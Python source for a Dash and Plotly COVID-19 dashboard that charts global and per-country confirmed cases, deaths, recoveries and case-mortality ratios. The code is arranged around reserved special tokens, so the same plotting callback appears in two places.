'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig1000.append(trace) anno.append(a) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Cases Double Every 3 Days'], hovertemplate= '<b>Cases Double Every 3 Days</b>', showlegend=True)) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Cases Double Every 7 Days'], hovertemplate= '<b>Cases Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10 (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Confirmed Cases', xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[ 'Days Since 1000 Cases'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig1000, 'layout': layout_global} return fig_global elif select_global == 'Global Deaths Trend': fig100 = [] anno = [] for group, dataframe in deaths_100_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 100 Deaths']) trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di ['Deaths'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region' ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig100.append(trace) anno.append(a) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Deaths Double Every 3 Days'], hovertemplate= '<b>Deaths Double Every 3 Days</b>', showlegend=True)) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Deaths Double Every 7 Days'], hovertemplate= '<b>Deaths Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Deaths', 'range': [np.log10(100), np.log10(cases_1000_start['Deaths']. max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Deaths', xaxis={'title': 'Days Since First 100 deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig100, 'layout': layout_global} return fig_global elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)': figmort = [] anno = [] m = mort.sort_values(by=['Confirmed'], ascending=False).head(20) m = m.sort_values(by=['Mortality_Percent'], ascending=True ).reset_index() for i in range(len(m)): m1 = m.loc[i, 'Country_Region'] m2 = m.loc[i, 'Mortality_Percent'] trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2], y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)], orientation='h', textposition='auto', marker=dict(color= '#FFB000', opacity=0.6, line=dict(color= 'rgba(255,176,0, 1)', width=1)), hovertemplate= '<b>%{y}</b><br>' + '<br>Observed Case Mortaility Pct: %{text}&#37;<br>', showlegend=False) figmort.append(trace) layout_global = go.Layout(yaxis={'title': 'Country / Region', 'fixedrange': True, 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Observed Case - Mortality Ratio', xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [ 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=750, hovermode='closest') fig_global = {'data': figmort, 'layout': layout_global} return fig_global elif select_global == 'Recoveries vs. Deaths By Country': figscat = [] rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100) ].reset_index() for i in range(len(rc)): scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i, 'Recovered']], mode='markers+text', text=[rc.loc[i, 'Country_Region']], marker_color=colors_dict_global[rc.loc[ i, 'Continent']], showlegend=False, marker=dict(size=12, line_width=1, opacity=0.75), hovertemplate= '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' + 'Deaths: %{x}<br>', textposition='bottom center', textfont= dict(size=10, color='rgba(0, 0, 0, 0.6)')) figscat.append(scat) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25, line=dict(color='grey', width=1), text=[ '# of Deaths = # of Recoveries'], hovertemplate= '<b># of Deaths = # of Recoveries</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Recoveries for Every Death', opacity=0.25, line=dict(color='green', width=3, dash='dash'), text=['2 Recoveries for Every Death'], hovertemplate= '<b>2 Recoveries for Every Death</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Deaths for Every Recovery', opacity=0.25, line=dict(color='firebrick', width=3, dash='dash' ), text=['2 Deaths for Every Recovery'], hovertemplate= '<b>2 Deaths for Every Recovery</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Recoveries', 'fixedrange': True, 'automargin': True, 'range': [np.log10(100), np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title= 'Recoveries vs. Deaths, By Country', xaxis={'title': 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100), np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, height=750, hovermode='closest' ) fig_global = {'data': figscat, 'layout': layout_global} return fig_global @app.callback([Output(component_id='main-dropdown-2', component_property= 'options'), Output(component_id='btext1', component_property='children' ), Output(component_id='subplot1', component_property='figure'), Output (component_id='btext2', component_property='children'), Output( component_id='subplot2', component_property='figure'), Output( component_id='btext3', component_property='children'), Output( component_id='subplot3', component_property='figure')], [Input( component_id='main-dropdown', component_property='value')]) def update_country(selected_country): if selected_country is None: selected_country = 'Canada' options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} else: options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} @app.callback(Output(component_id='box-1', component_property='figure'), [ Input(component_id='main-dropdown', component_property='value'), Input( component_id='main-dropdown-2', component_property='value')]) def update_maingraph(selected_country, selected_graph): if selected_graph is None and selected_country is None: selected_country = 'Canada' figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph is None and selected_country is not None: figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph == 'Total and Daily Confirmed Cases': figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode= 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode= 'lines', fill='tozeroy')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} else: cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F', 'Recovered': '#009E73'} figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x= final_df.loc[final_df['Country_Region'] == selected_country, 'Date'], y=final_df.loc[final_df['Country_Region'] == selected_country, selected_graph], marker_color=cols_dict[ selected_graph])] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, selected_graph].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} if __name__ == '__main__': app.run_server() <|reserved_special_token_1|> <|reserved_special_token_0|> import pandas as pd import numpy as np import matplotlib.pyplot as plt from datetime import date from COVID19_Diff import calc_diff_country import dash import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output import plotly.graph_objects as go import math urls = [ 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv' , 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv' , 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv' ] final_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv') final_df = calc_diff_country(final_df) final_df['Date'] = pd.to_datetime(final_df['Date']) final_df['Country_Region'] = final_df['Country_Region'].astype(str) cases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df ['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[ 'Date'] cases_1000_start = cases_1000_start.reset_index() cases_1000_start = cases_1000_start.rename(columns={'Date': 'Start_Date'}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() cases_1000_start = pd.merge(cases_1000_start, final_df, on=[ 'Country_Region'], how='right') cases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date']) cases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date']) cases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()] cases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] - cases_1000_start['Start_Date']).dt.days deaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df[ 'Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[ 'Date'] deaths_100_start = deaths_100_start.reset_index() deaths_100_start = deaths_100_start.rename(columns={'Date': 'Start_Date'}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() deaths_100_start = pd.merge(deaths_100_start, final_df, on=[ 'Country_Region'], how='right') deaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date']) deaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date']) deaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()] deaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] - deaths_100_start['Start_Date']).dt.days mort = final_df.groupby(['Country_Region'])['Date'].max().reset_index() mort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left') mort['Mortality_Percent'] = mort['Deaths'] / mort['Confirmed'] * 100.0 colors_dict_global = {'Europe': '#1D6996', 'Asia': '#CC503E', 'Africa': '#94346E', 'North America': '#38A6A5', 'Middle East': '#EDAD08', 'South America': '#E17C05', 'Caribbean & Central America': '#0F8554', 'Oceania': '#73AF48'} external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'] app = dash.Dash(__name__, external_stylesheets=external_stylesheets) server = app.server app.layout = html.Div(children=[html.H2(children='COVID-19 Dashboard'), html.H4(children= 'A Basic Dashboard to Help Track the COVID-19 Pandemic'), html.Br(), html.H5(children='Global View'), html.P(children= 'The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. The Global View includes the following:' ), html.Div([html.Ul([html.Li([html.B( 'Cumulative Cases by Country Since First 1000 Cases: '), 'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis' ]), html.Li([html.B( 'Cumulative Cases by Country Since First 100 Deaths: '), 'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis' ]), html.Li([html.B( 'Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): ' ), 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)' ]), html.Li([html.B( 'Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: ' ), 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)' ])])], style={'font-size': 12}), html.Br(), dcc.Dropdown(id= 'global-dropdown', options=[{'label': y, 'value': y} for y in [ 'Global Cases Trend', 'Global Deaths Trend', '% Mortality by Confirmed Cases (Top 20 Countries)', 'Recoveries vs. Deaths By Country']], placeholder= 'Pick Graphs From Here...'), dcc.Graph(id='global-box-1'), html.Br(), html.H5(children='Country View'), html.P( 'The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. The Country View includes the following:' ), html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B ('Confirmed: '), 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Recovered: '), 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Deaths: '), 'Cumulative Deaths from COVID-19 since January 22nd, 2020']), html.Li([ html.B('Total and Daily Confirmed Cases: '), 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country' ])])]), dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value': x} for x in list(final_df.Country_Region.unique())], placeholder= 'Pick a Country From Here...'), dcc.Dropdown(id='main-dropdown-2', placeholder='Pick Graphs From Here...'), dcc.Graph(id='box-1'), html. Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id= 'btext1'), dcc.Graph(id='subplot1')], className='four columns', style={ 'color': '#648FFF'}), html.Div([html.H6(children= 'Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id= 'subplot2')], className='four columns', style={'color': '#DC267F'}), html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id= 'btext3'), dcc.Graph(id='subplot3')], className='four columns', style={ 'color': '#009E73', 'layout': 'right'})], className='row')]) @app.callback(Output(component_id='global-box-1', component_property= 'figure'), [Input(component_id='global-dropdown', component_property= 'value')]) def global_update(select_global): if select_global == 'Global Cases Trend' or select_global is None: fig1000 = [] anno = [] for group, dataframe in cases_1000_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 1000 Cases']) trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di ['Confirmed'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig1000.append(trace) anno.append(a) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Cases Double Every 3 Days'], hovertemplate= '<b>Cases Double Every 3 Days</b>', showlegend=True)) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Cases Double Every 7 Days'], hovertemplate= '<b>Cases Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10 (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Confirmed Cases', xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[ 'Days Since 1000 Cases'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig1000, 'layout': layout_global} return fig_global elif select_global == 'Global Deaths Trend': fig100 = [] anno = [] for group, dataframe in deaths_100_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 100 Deaths']) trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di ['Deaths'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region' ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig100.append(trace) anno.append(a) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Deaths Double Every 3 Days'], hovertemplate= '<b>Deaths Double Every 3 Days</b>', showlegend=True)) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Deaths Double Every 7 Days'], hovertemplate= '<b>Deaths Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Deaths', 'range': [np.log10(100), np.log10(cases_1000_start['Deaths']. max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Deaths', xaxis={'title': 'Days Since First 100 deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 